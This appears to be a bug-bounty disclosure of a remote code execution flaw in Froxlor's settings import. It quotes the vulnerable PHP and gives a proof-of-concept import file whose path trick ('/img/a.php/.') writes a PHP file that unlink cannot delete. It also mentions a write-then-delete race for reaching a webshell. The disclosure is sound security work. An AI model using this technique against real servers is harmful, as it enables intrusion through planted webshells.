Remote Code Execution Vulnerability Through Unrestrict File Write

2023-03-0414:13:01

renhaot

www.huntr.dev

vulnerability

remote code execution

file write

webshell

unlink function

security bug

proof of concept

time gap

multi-threading

bug bounty

0.001 Low

EPSS

Percentile

34.0%

JSON

Description

In the import setting function, in the file Froxlor\lib\Froxlor\SImExporter.php

file_put_contents($img_filename, $img_data);

if (function_exists('finfo_open')) {
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_file($finfo, $img_filename);
    finfo_close($finfo);
} else {
    $mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
    $mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
    @unlink($img_filename);
    throw new Exception("Uploaded file is not a valid image");
}

$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);

if (!in_array($file_extension, [
    'jpeg',
    'jpg',
    'png',
    'gif'
])) {
    @unlink($img_filename);
    throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}

the code first writes the data provided by the user to the file path provided by the user

And then verifies the file extension. If failed, it will delete that file through unlink function.

Unfortunately, there is a small trick between the file_put_content and unlink functions. If we set the file path to /img/a.php/., the file_put_content function can save the file in /img/a.php, but the unlink function cannot delete /img/a.php.

Proof of Concept

So, here are our proof of concept.

{
    "panel.version": "2.0.13",
    "panel.db_version": "202302030",
    "_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
    "a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
    "a.b": "/img/a.php/."
}

If we import this file in the settings panel, it will write the content of <?php phpinfo(); into img/a.php in the webserver.

attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing

Also, it’s worth noting that we can still exploit this vulnerability if there are no tricks for the unlink function. Because the code first writes the file and then deletes it, the time gap is enough for us to access our webshell through multi-threading. Hope this gets noticed when it’s fixed.